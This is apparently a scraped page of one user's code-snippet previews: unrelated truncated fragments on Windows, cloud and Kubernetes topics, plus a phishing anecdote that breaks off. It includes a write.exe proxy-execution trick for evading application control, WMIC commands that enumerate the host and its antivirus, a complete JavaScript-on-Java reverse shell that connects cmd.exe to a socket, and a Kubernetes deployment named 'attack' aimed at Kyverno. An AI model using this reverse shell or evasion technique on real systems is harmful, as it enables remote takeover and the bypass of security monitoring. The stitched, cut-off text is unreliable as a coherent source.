BenjiTrapp

Proxying binary execution through write.exe

Write.exe is a wrapper binary for launching wordpad. Historically it was used to launch Microsoft Write, a very basic word processor from pre-2000 era. It has been left as a compatibility stub from Windows 95 onwards.

This binary checks HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe registry key for the location of wordpad's executable, which can be created by regular user. This might be utilized to confuse detection/application control solutions that rely on parent-child relationships. Resulting process will be spawned as a child to the Windows-signed (Signing Level 12) write.exe.

If one controls a domain, it is possible to utilize UNC paths to run remote binaries without dropping them to the disk. This requires additional steps to bypass security prompt.

tl;dr

I want to just run an exe

BenjiTrapp

Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

BenjiTrapp

var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();

BenjiTrapp

#!/bin/bash

# Versionsnummer (Anpassen, falls eine andere Version benötigt wird)
ORACLE_VERSION="21_9"  # Beispiel: 21.9
ORACLE_BASE_URL="https://download.oracle.com/otn_software/linux/instantclient"

# Zielverzeichnis
ORACLE_DIR="/opt/oracle"
INSTANT_CLIENT_DIR="$ORACLE_DIR/instantclient_$ORACLE_VERSION"

BenjiTrapp

g.co, Google's official URL shortcut (update: or Google Workspace's domain verification, see bottom), is compromised. People are actively having their Google accounts stolen.

Someone just tried the most sophisticated phishing attack I've ever seen. I almost fell for it. My mind is a little blown.

1. Someone named "Chloe" called me from 650-203-0000 with Caller ID saying "Google". She sounded like a real engineer, the connection was super clear, and she had an American accent. Screenshot.

2. They said that they were from Google Workspace and someone had recently gained access to my account, which they had blocked. They asked me if I had recently logged in from Frankfurt, Germany and I said no.

3. I asked if they can confirm this is Google calling by emailing me from a Google email and they said sure and sent me this email and told me to look for a case number in it, which I saw in

BenjiTrapp

#!/bin/bash

# Liste aller Compute-Instanzen abrufen und in ein Array speichern
instances=($(gcloud compute instances list --format="value(name,zone)"))

# Überprüfen, ob "privilegeduser:ssh-rsa" in den Metadaten der Instanzen vorkommt
for instance_info in "${instances[@]}"; do
  instance=$(echo "$instance_info" | cut -d' ' -f1)
  zone=$(echo "$instance_info" | cut -d' ' -f2)
  echo "Überprüfe Instanz: $instance in Zone: $zone"

BenjiTrapp

#!/usr/bin/env python3
import logging
import sys
from subprocess import call
from os import environ, uname
from time import gmtime

user = environ.get("SUDO_USER", environ.get("USER"))

log_file = environ["LOG_HOME"] + "/.command_wrapper.log"

BenjiTrapp

SVCIP="$(kubectl get svc -n kyverno kyverno-svc --output jsonpath='{.spec.clusterIP}')"
PODNAME="$(kubectl get pod -n kyverno -l app.kubernetes.io/component=admission-controller --output name | sed -e 's/^pod\///g')"
PODIP="$(kubectl get pod -n kyverno $PODNAME --output jsonpath='{.status.podIP}')"

kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: attack
spec:

BenjiTrapp

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ..,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,.        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,         ,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,   @@&.   ..,,...  *(#(,(%#*   ..,,     .#@@  .,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,   @@@@@     %%%%%%%%%%%%%%%%%%%%&.    @@@@@   ,,,,,,,,,,,,,,,,

BenjiTrapp

# Add user.
useradd -m username
# -m creates a home directory for the user.

# Set Password.
passwd username

# Set user group to sudo.
usermod -a -G sudo username
# -a option to add and ‘-G sudo’ means to add the user to the sudo group.